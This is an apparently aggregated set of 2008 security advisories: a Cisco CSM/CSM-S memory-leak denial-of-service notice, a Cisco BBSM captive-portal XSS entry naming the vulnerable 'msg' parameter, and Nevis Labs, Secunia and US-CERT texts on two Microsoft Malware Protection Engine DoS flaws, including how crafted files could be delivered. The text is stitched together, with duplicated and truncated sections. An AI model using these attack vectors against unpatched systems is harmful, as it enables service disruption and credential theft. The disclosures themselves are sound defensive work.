+--- ---- ------------------ ----------- -------------------------------------
1 3 WS-SVC-AGM-1-K9 SAD092601W5 Hw : 1.0
Fw : 7.2(1)
Sw : 5.0(3)
2 6 WS-SVC-FWM-1 SAD093200X8 Hw : 3.0
Fw : 7.2(1)
Sw : 3.2(3)1
3 8 WS-SVC-IDSM-2 SAD0932089Z Hw : 5.0
Fw : 7.2(1)
Sw : 5.1(6)E1
4 4 WS-X6066-SLB-APC SAD093004BD Hw : 1.7
Fw :
Sw : 4.2(3)
5 2 WS-SUP720-3B SAL0934888E Hw : 4.4
Fw : 8.1(3)
Sw : 12.2(18)SXF11
Sw1: 8.6(0.306)R3V15
WS-SUP720 SAL09348488 Hw : 2.3
Fw : 12.2(17r)S2
Sw : 12.2(18)SXF11
WS-F6K-PFC3B SAL0934882R Hw : 2.1
A Cisco CSM or CSM-S is configured for layer 7 load balancing if one or
more layer 7 Server Load Balancing (SLB) policies are referenced in the
configuration of a virtual server. There are six possible types of SLB
policies: "client-group", "cookie-map", "header-map", "reverse-sticky",
"sticky-group", and "url-map". Of these, the "client-group" policy
type is always a layer 4 policy. The remaining policy types are
layer 7 policies and, if used, would render a device affected by the
vulnerability described in this document. Note the SLB
policy "TEST-SPORTS-50", which uses "url-map" and "header-map" layer 7
policies, and that is applied to the virtual server named "WEB":
module ContentSwitchingModule 5
[...]
!
policy TEST-SPORTS-50
url-map SPORTS
header-map TEST
client-group 50
serverfarm WEBFARM2
!
vserver WEB
virtual 10.20.221.100 tcp www
serverfarm WEBFARM
persistent rebalance
slb-policy TEST-SPORTS-50
inservice
Products Confirmed Not Vulnerable
+--------------------------------
Only Cisco CSM modules running indicated 4.2 versions are affected by
this vulnerability. CSM software versions 4.1, 3.2 and 3.1 are not
affected by this vulnerability.
Cisco CSM-S modules running indicated 2.1 versions are the only
vulnerable versions of software for that product.
The Cisco IOS SLB feature is not affected by this vulnerability.
No other Cisco products are currently known to be affected by this
vulnerability. The Cisco Secure Content Accelerator is not affected by
this vulnerability.
Details
=======
The Cisco CSM is an integrated SLB line card for the Catalyst 6500 and
7600 Series that is designed to enhance the response time for client
traffic to end points including servers, caches, firewalls, Secure
Sockets Layer (SSL) devices, and VPN termination devices.
The Cisco CSM-S combines high-performance SLB with SSL offload. The
CSM-S is similar to the CSM; however, unlike the CSM, the CSM-S can
terminate and initiate SSL-encrypted traffic. This ability allows the
CSM-S to perform intelligent load balancing while ensuring secure
end-to-end encryption.
The memory leak can be detected by issuing the command "show module
ContentSwitchingModule <slot #> tech-support all | include Outstanding"
on the supervisor and checking the command output for a high number of
outstanding buffers as seen in the following example:
switch#show module ContentSwitchingModule 10 tech-support all | include Outstanding
Outstanding slowpath(low pri) buffers 0 0
Outstanding slowpath(high pri) buffers 0 0
Outstanding blocks 0 0
Outstanding small buffers 0 0
Outstanding medium buffers 823 0
Outstanding large buffers 0 0
Outstanding sessions 0 0
Outstanding Closes 0 0
Close Relinquish Outstanding 0
Because small, medium, and large buffers can be affected by the memory
leak, administrators are advised to check the number of these buffers in
the output from the preceding command to accurately detect a memory leak
condition.
This vulnerability is documented in Cisco Bug ID CSCsl40722 and has been
assigned Common Vulnerabilities and Exposures (CVE) ID CVE-2008-1749.
Vulnerability Scoring Details
+----------------------------
Cisco has provided scores for the vulnerability in this advisory based
on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in
this Security Advisory is done in accordance with CVSS version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of the
vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding VSS
Cat
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html.
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at
http://intellishield.cisco.com/security/alertmanager/cvss.
* CSM: Potential buffer loss with irregular client streams (CSCsl40722)
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
Impact
======
Successful exploitation of this vulnerability against a system running
a vulnerable version of the Cisco CSM or the Cisco CSM-S software may
cause the CSM or CSM-S to stop passing traffic. Repeated attacks may
result in a prolonged DoS condition, which could affect the services
that are offered by the end point devices behind the CSM or CSM-S.
Note that the supervisor or any other non-CSM or non-CSM-S service
module in the same chassis of the Catalyst 6500 switch or 7600 Series
router that hosts the CSM or CSM-S will not be affected by this
vulnerability.
Software Versions and Fixes
===========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to determine
exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.
This vulnerability is fixed in version 4.2.9 of the Cisco CSM software,
and in version 2.1.8 of the Cisco CSM-S software.
CSM software can be downloaded from
http://www.cisco.com/pcgi-bin/tablebuild.pl/cat6000-csm?psrtdcat20e2.
Information on how to upgrade the CSM software is available at
http://www.cisco.com/en/US/products/hw/modules/ps2706/products_tech_note09186a0080094526.shtml.
CSM-S software can be downloaded from
http://www.cisco.com/pcgi-bin/tablebuild.pl/cat6000-csms?psrtdcat20e2.
Information on how to upgrade the CSM-S software is available at
http://www.cisco.com/en/US/docs/interfaces_modules/services_modules/csms/2.1.1/configuration/guide/getstart.html#wp1041858.
Workarounds
===========
There are no workarounds for this vulnerability. When the Cisco CSM or
Cisco CSM-S has run out of memory it will simply stop passing traffic
and it will have to be reloaded. The CSM and CSM-S can be reloaded via
the command "hw-module module <CSM or CSM-S slot number> reset" (Cisco
IOS) or via the command "reset <CSM or CSM-S slot number>" (Cisco CatOS)
from the privileged EXEC prompt of the supervisor. There is no need to
reload the supervisor.
Obtaining Fixed Software
========================
Cisco has released free software updates that address this
vulnerability. Prior to deploying software, customers should consult
their maintenance provider or check the software for feature set
compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at
http://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html,
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml.
Do not contact psirt@cisco.com or security-alert@cisco.com for software
upgrades.
Customers with Service Contracts
+-------------------------------
Customers with contracts should obtain upgraded software through their
regular update channels. For most customers, this means that upgrades
should be obtained through the Software Center on Cisco's worldwide
website at http://www.cisco.com.
Customers using Third Party Support Organizations
+------------------------------------------------
Customers whose Cisco products are provided or maintained through prior
or existing agreements with third-party support organizations, such
as Cisco Partners, authorized resellers, or service providers should
contact that support organization for guidance and assistance with the
appropriate course of action in regards to this advisory.
The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or fix
is the most appropriate for use in the intended network before it is
deployed.
Customers without Service Contracts
+----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco service
contract, and customers who purchase through third-party vendors but are
unsuccessful in obtaining fixed software through their point of sale
should acquire upgrades by contacting the Cisco Technical Assistance
Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to a
free upgrade. Free upgrades for non-contract customers must be requested
through the TAC.
Refer to http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml
for additional TAC contact information, including localized telephone
numbers, and instructions and e-mail addresses for use in various
languages.
Exploitation and Public Announcements
=====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerability described in this advisory.
This vulnerability was discovered during the investigation of customer
support cases.
Status of this Notice: FINAL
============================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY
ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or Paraphrase of the text of this document that omits
the distribution URL in the following section is an uncontrolled copy,
and may lack important information or contain factual errors.
Distribution
============
This advisory is posted on Cisco's worldwide website at:
http://www.cisco.com/warp/public/707/cisco-sa-20080514-csm.shtml.
In addition to worldwide web posting, a text version of this notice is
clear-signed with the Cisco PSIRT PGP key and is posted to the following
e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-bulletins@first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on mailing
lists or newsgroups. Users concerned about this problem are encouraged
to check the above URL for any updates.
Revision History
================
+------------------------------------------------------------+
| Revision 1.0 | 2008-May-14 | Initial public release |
+------------------------------------------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities in
Cisco products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html.
This includes instructions for press inquiries regarding Cisco security
notices. All Cisco security advisories are available at
http://www.cisco.com/go/psirt.
+--------------------------------------------------------------------
All contents are Copyright (C) 2007-2008 Cisco Systems, Inc. All
rights reserved.
+--------------------------------------------------------------------
Updated: May 14, 2008 Document ID: 105450
+--------------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
iD8DBQFIKvyq86n/Gc8U/uARAknKAJ4h3Cv1kvEwebcrqEaYQ8J+AWcfvACggljK
o0g1JsSfpI6hXBtkEYmWJj4=
=B29t
-----END PGP SIGNATURE-----
| VAR-200805-0355 | CVE-2008-2165 | Cisco Building Broadband Service Manager (BBSM) Captive Portal Vulnerable to cross-site scripting |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in AccessCodeStart.asp in Cisco Building Broadband Service Manager (BBSM) Captive Portal 5.3 allows remote attackers to inject arbitrary web script or HTML via the msg parameter.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Cisco BBSM 5.3 is vulnerable; other versions may also be affected. ----------------------------------------------------------------------
Secunia Network Software Inspector 2.0 (NSI) - Public Beta
The Public Beta has ended. Thanks to all that participated.
Input passed to the "msg" parameter in AccessCodeStart.asp is not
properly sanitised before being returned to a user.
SOLUTION:
Apply patch BBSMPatch5332.zip.
http://tools.cisco.com/support/downloads/go/ImageList.x?relVer=5.3&mdfid=278455427&sftType=Building%20Broadband%20Service%20Manager%20(BBSM)%20Updates&optPlat=&nodecount=2&edesignator=null&modelName=Cisco%20Building%20Broadband%20Service%20Manager%205.3&treeMdfId=281527126&treeName=Network%20Monitoring%20and%20Management
PROVIDED AND/OR DISCOVERED BY:
Brad Antoniewicz
ORIGINAL ADVISORY:
http://archives.neohapsis.com/archives/bugtraq/2008-05/0166.html
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-200805-0217 | CVE-2008-1437 | Microsoft Malware Protection Engine Service disruption in (DoS) Vulnerabilities |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Unspecified vulnerability in Microsoft Malware Protection Engine (mpengine.dll) 1.1.3520.0 and 0.1.13.192, as used in multiple Microsoft products, allows context-dependent attackers to cause a denial of service (engine hang and restart) via a crafted file, a different vulnerability than CVE-2008-1438.
Attackers can exploit this issue to cause an affected computer to stop responding or to restart. Successful attacks will deny service to legitimate users. ----------------------------------------------------------------------
Secunia Network Software Inspector 2.0 (NSI) - Public Beta
The Public Beta has ended. Thanks to all that participated.
PROVIDED AND/OR DISCOVERED BY:
The vendor credits SoWhat, Nevis Labs.
ORIGINAL ADVISORY:
MS08-029 (KB952044):
http://www.microsoft.com/technet/security/Bulletin/MS08-029.mspx
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. Microsoft Malware Protection Engine TWO DoS Vulnerabilities
By Sowhat of Nevis Labs
Date: 2008.05.14
http://www.nevisnetworks.com
http://secway.org/advisory/AD20080514.txt
CVE: CVE-2008-1437
CVE-2008-1438
Vendor
Microsoft
Affected:
Windows Live OneCare
Microsoft Antigen for Exchange
Microsoft Antigen for SMTP Gateway
Microsoft Windows Defender
Microsoft Forefront Client Security
Microsoft Forefront Security for Exchange Server
Microsoft Forefront Security for SharePoint
Standalone System Sweeper located in Diagnostics and Recovery Toolset 6.0
Details:
There are two vulnerabilities idenitified in Microsoft Antivirus product.
These vulnerabilities can be exploited to cause Denial of service.
1. CVE-2008-1437 PE Parsing Memory Corruption
While scanning a specially crafted PE file, Malware orotection engine
(MsMpEng.exe/mpengine.dll for Windows Live OneCare) will crash.
Currently, There's no evidence of code execution found.
Please note that this vulnerability can be triggered in various ways:
a. by sending emails to target mail server which is protected by MS
antivirus
b. by sending emails to victim who is using Windows Onecare or Windows
Defender.
c. by convining the victim to visit some websites.
d. by sending files (can be any extension) to victims through P2P/IM.
Real Time protection is enabled by default, so in the case b&c, the
vulnerability
can be exploited without any further user interaction after the victim
recieved
the email or opened the website.
2. CVE-2008-1438 PE Parsing Disk Space D.o.S
While parsing a specially crafted file with a malformed "size of header"
is scanned by Microsoft Windows OneCare, there will be Disk Space DOS
condition.
Microsoft Malware protection engine will allocate disk space as much as the
PE file
"claimed", It can "eat" several Gb disk space of Windows installation
driver.
Proof of Concept:
No POC will be released.
Fix:
Microsoft has released an update address this issue.
http://www.microsoft.com/technet/security/Bulletin/MS08-029.mspx
Vendor Response:
2008.04.18 Vendor notified via email
2008.04.18 Vendor response, developing for patch
2008.05.14 Patch Release
2008.05.14 Advisory released
--
Sowhat
http://secway.org
"Life is like a bug, Do you know how to exploit it ?"
. The most severe
vulnerabilities could allow a remote, unauthenticated attacker to
execute arbitrary code.
II. Impact
A remote, unauthenticated attacker could execute arbitrary code, gain
elevated privileges, or cause a denial of service.
III. Solution
Apply updates from Microsoft
Microsoft has provided updates for these vulnerabilities in the May
2008 Security Bulletin Summary. The security bulletin describes any
known issues related to the updates. Administrators are encouraged to
note these issues and test for any potentially adverse effects.
Administrators should consider using an automated update distribution
system such as Windows Server Update Services (WSUS).
IV. References
* US-CERT Vulnerability Notes for Microsoft May 2008 updates -
<http://www.kb.cert.org/vuls/byid?searchview&query=ms08-may>
* Microsoft Security Bulletin Summary for May 2008 -
<http://www.microsoft.com/technet/security/bulletin/ms08-may.mspx>
* Microsoft Update -
<https://www.update.microsoft.com/microsoftupdate/>
* Windows Server Update Services -
<http://www.microsoft.com/windowsserversystem/updateservices/default.mspx>
____________________________________________________________________
The most recent version of this document can be found at:
<http://www.us-cert.gov/cas/techalerts/TA08-134A.html>
____________________________________________________________________
Feedback can be directed to US-CERT Technical Staff. Please send
email to <cert@cert.org> with "TA08-134A Feedback VU#534907" in the
subject.
____________________________________________________________________
For instructions on subscribing to or unsubscribing from this
mailing list, visit <http://www.us-cert.gov/cas/signup.html>.
____________________________________________________________________
Produced 2008 by US-CERT, a government organization.
Terms of use:
<http://www.us-cert.gov/legal.html>
____________________________________________________________________
Revision History
May 13, 2008: Initial release
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)
iQEVAwUBSCnrE/RFkHkM87XOAQJAoAf/XrkJlT9AS30/CZwAMO9qta8TbtLQTZR3
/yAV/h2CmOKhFsbjdh8L4+GcP0n66twWhmMBfBs6BosOoaqqhkeJcE6JoyQ2Kso1
MnhXjPJuGtgEPcfYX9bg42rnZ5WDXGh9EuhoZVyUV4UeUQ8qRM8LL3OIWBHubE7R
fcOqIVDz/qtCC1U+RUdrbdeV8XB48mshiLoWjxzOT0FzeOKsBwsyHzaO5mAeEy4E
1hsLC2u4idGlq9Ezl82XODyH6vtHBKq7yKDv+FkVHbCqwB+thqPkUo2es+amASra
shcJggg39WWmPWphqnBz94rkdwitsvW3ymOWt1F27GecX1sveofLDQ==
=rhf4
-----END PGP SIGNATURE-----
| VAR-200805-0218 | CVE-2008-1438 | Microsoft Malware Protection Engine Service disruption related to temporary file creation (DoS) Vulnerabilities |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Unspecified vulnerability in Microsoft Malware Protection Engine (mpengine.dll) 1.1.3520.0 and 0.1.13.192, as used in multiple Microsoft products, allows context-dependent attackers to cause a denial of service (disk space exhaustion) via a file with "crafted data structures" that trigger the creation of large temporary files, a different vulnerability than CVE-2008-1437. (DoS) There is a vulnerability that becomes a condition.The processing of a file crafted by a third party can create a large temporary file that can run out of disk space.
Attackers can exploit this issue to cause an affected computer to stop responding or to restart. Successful attacks will deny service to legitimate users. ----------------------------------------------------------------------
Secunia Network Software Inspector 2.0 (NSI) - Public Beta
The Public Beta has ended. Thanks to all that participated.
PROVIDED AND/OR DISCOVERED BY:
The vendor credits SoWhat, Nevis Labs.
ORIGINAL ADVISORY:
MS08-029 (KB952044):
http://www.microsoft.com/technet/security/Bulletin/MS08-029.mspx
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. Microsoft Malware Protection Engine TWO DoS Vulnerabilities
By Sowhat of Nevis Labs
Date: 2008.05.14
http://www.nevisnetworks.com
http://secway.org/advisory/AD20080514.txt
CVE: CVE-2008-1437
CVE-2008-1438
Vendor
Microsoft
Affected:
Windows Live OneCare
Microsoft Antigen for Exchange
Microsoft Antigen for SMTP Gateway
Microsoft Windows Defender
Microsoft Forefront Client Security
Microsoft Forefront Security for Exchange Server
Microsoft Forefront Security for SharePoint
Standalone System Sweeper located in Diagnostics and Recovery Toolset 6.0
Details:
There are two vulnerabilities idenitified in Microsoft Antivirus product.
These vulnerabilities can be exploited to cause Denial of service.
1. CVE-2008-1437 PE Parsing Memory Corruption
While scanning a specially crafted PE file, Malware orotection engine
(MsMpEng.exe/mpengine.dll for Windows Live OneCare) will crash.
Currently, There's no evidence of code execution found.
Please note that this vulnerability can be triggered in various ways:
a. by sending emails to target mail server which is protected by MS
antivirus
b. by sending emails to victim who is using Windows Onecare or Windows
Defender.
c. by convining the victim to visit some websites.
d. by sending files (can be any extension) to victims through P2P/IM.
Real Time protection is enabled by default, so in the case b&c, the
vulnerability
can be exploited without any further user interaction after the victim
recieved
the email or opened the website.
2.
Proof of Concept:
No POC will be released.
Fix:
Microsoft has released an update address this issue.
http://www.microsoft.com/technet/security/Bulletin/MS08-029.mspx
Vendor Response:
2008.04.18 Vendor notified via email
2008.04.18 Vendor response, developing for patch
2008.05.14 Patch Release
2008.05.14 Advisory released
--
Sowhat
http://secway.org
"Life is like a bug, Do you know how to exploit it ?"
. The most severe
vulnerabilities could allow a remote, unauthenticated attacker to
execute arbitrary code.
II. Impact
A remote, unauthenticated attacker could execute arbitrary code, gain
elevated privileges, or cause a denial of service.
III. Solution
Apply updates from Microsoft
Microsoft has provided updates for these vulnerabilities in the May
2008 Security Bulletin Summary. The security bulletin describes any
known issues related to the updates. Administrators are encouraged to
note these issues and test for any potentially adverse effects.
Administrators should consider using an automated update distribution
system such as Windows Server Update Services (WSUS).
IV. References
* US-CERT Vulnerability Notes for Microsoft May 2008 updates -
<http://www.kb.cert.org/vuls/byid?searchview&query=ms08-may>
* Microsoft Security Bulletin Summary for May 2008 -
<http://www.microsoft.com/technet/security/bulletin/ms08-may.mspx>
* Microsoft Update -
<https://www.update.microsoft.com/microsoftupdate/>
* Windows Server Update Services -
<http://www.microsoft.com/windowsserversystem/updateservices/default.mspx>
____________________________________________________________________
The most recent version of this document can be found at:
<http://www.us-cert.gov/cas/techalerts/TA08-134A.html>
____________________________________________________________________
Feedback can be directed to US-CERT Technical Staff. Please send
email to <cert@cert.org> with "TA08-134A Feedback VU#534907" in the
subject.
____________________________________________________________________
For instructions on subscribing to or unsubscribing from this
mailing list, visit <http://www.us-cert.gov/cas/signup.html>.
____________________________________________________________________
Produced 2008 by US-CERT, a government organization.
Terms of use:
<http://www.us-cert.gov/legal.html>
____________________________________________________________________
Revision History
May 13, 2008: Initial release
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)
iQEVAwUBSCnrE/RFkHkM87XOAQJAoAf/XrkJlT9AS30/CZwAMO9qta8TbtLQTZR3
/yAV/h2CmOKhFsbjdh8L4+GcP0n66twWhmMBfBs6BosOoaqqhkeJcE6JoyQ2Kso1
MnhXjPJuGtgEPcfYX9bg42rnZ5WDXGh9EuhoZVyUV4UeUQ8qRM8LL3OIWBHubE7R
fcOqIVDz/qtCC1U+RUdrbdeV8XB48mshiLoWjxzOT0FzeOKsBwsyHzaO5mAeEy4E
1hsLC2u4idGlq9Ezl82XODyH6vtHBKq7yKDv+FkVHbCqwB+thqPkUo2es+amASra
shcJggg39WWmPWphqnBz94rkdwitsvW3ymOWt1F27GecX1sveofLDQ==
=rhf4
-----END PGP SIGNATURE-----